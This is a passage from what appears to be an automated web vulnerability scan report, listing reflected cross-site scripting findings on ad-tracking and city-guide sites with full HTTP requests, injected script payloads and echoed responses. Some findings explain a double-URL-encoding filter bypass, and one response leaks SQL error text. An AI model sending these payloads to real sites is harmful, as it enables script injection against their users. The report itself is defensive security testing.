GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=1512115362<script>alert(1)</script>c2ae901adec&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:35 GMT
Expires: Thu, 31 Mar 2011 00:53:36 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQQTCCABA=BJDABGFBNKIJMNOLMEEHBLEG; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 1512115362<script>alert(1)</script>c2ae901adec, @ipAddress = '173.193.214.243', @sessionId = '358722929', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default', @browserVersion = '0.0', @domain = 'undefined', @op
...[SNIP]...

5.57. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 11b9c<script>alert(1)</script>0fafab07e80 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=2115211b9c<script>alert(1)</script>0fafab07e80&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:46 GMT
Expires: Thu, 31 Mar 2011 00:53:47 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSSDAQTD=DMFLEBDBFICMGDJEEAPNGJDN; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 2115211b9c<script>alert(1)</script>0fafab07e80, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '320191441', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @bro
...[SNIP]...

5.58. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 9ff62<script>alert(1)</script>a02173191c0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=63309ff62<script>alert(1)</script>a02173191c0&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:43 GMT
Expires: Thu, 31 Mar 2011 00:53:43 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSAQSSSA=ONHBGAMBKDGPKDOKOLCOCKME; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 63309ff62<script>alert(1)</script>a02173191c0, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '470174562', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default'
...[SNIP]...

5.59. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 801ff<script>alert(1)</script>31ecc76c45b was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E801ff<script>alert(1)</script>31ecc76c45b&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:28 GMT
Expires: Thu, 31 Mar 2011 00:53:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSCDADCC=GEJBKNEBJAEILNIPENOHAGGD; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>801ff<script>alert(1)</script>31ecc76c45b, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '349885665', @pixel = '0', @ipNumber = '291516
...[SNIP]...

5.60. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 778a4<script>alert(1)</script>cb1fdeb4541 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146778a4<script>alert(1)</script>cb1fdeb4541&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:39 GMT
Expires: Thu, 31 Mar 2011 00:53:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCATAABCD=FNGFGBFBAEMHNKPEBBBEDMOA; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146778a4<script>alert(1)</script>cb1fdeb4541, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '353828072', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default', @browserVersion = '0.0', @do
...[SNIP]...

5.61. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf was submitted in the REST URL parameter 2. This input was echoed as 7f794</script><script>alert(1)</script>2a4004720cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17815
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include7f794</script><script>alert(1)</script>2a4004720cf" : "national";

var isUrl2 = "background.js";
s_265.prop2= isUrl2 != ''? "background.js" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchase
...[SNIP]...

5.62. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab3c"><script>alert(1)</script>489e273b4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17459
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9"/>
...[SNIP]...

5.63. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c was submitted in the REST URL parameter 3. This input was echoed as 3f2a6</script><script>alert(1)</script>c6285eeee8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include/background.js3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17390
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
"+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include" : "national";

var isUrl2 = "background.js3f2a6</script><script>alert(1)</script>c6285eeee8c";
s_265.prop2= isUrl2 != ''? "background.js3f2a6</script>
...[SNIP]...

5.64. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806f6"><script>alert(1)</script>d9a439bdd79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17175
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9"/>
...[SNIP]...

5.65. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34 was submitted in the REST URL parameter 2. This input was echoed as d8037</script><script>alert(1)</script>465808f0b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/included8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17836
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "included8037</script><script>alert(1)</script>465808f0b34" : "national";

var isUrl2 = "citysbest-min.js";
s_265.prop2= isUrl2 != ''? "citysbest-min.js" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.pu
...[SNIP]...

5.66. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464e5"><script>alert(1)</script>58128cfd51f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17474
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29"/>
...[SNIP]...

5.67. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b was submitted in the REST URL parameter 3. This input was echoed as 31cbd</script><script>alert(1)</script>77e4b54285b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include/citysbest-min.js31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17410
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include" : "national";

var isUrl2 = "citysbest-min.js31cbd</script><script>alert(1)</script>77e4b54285b";
s_265.prop2= isUrl2 != ''? "citysbest-min.js31cbd</script>
...[SNIP]...

5.68. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdafe"><script>alert(1)</script>f56c1613a2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17196
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29"/>
...[SNIP]...

5.69. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

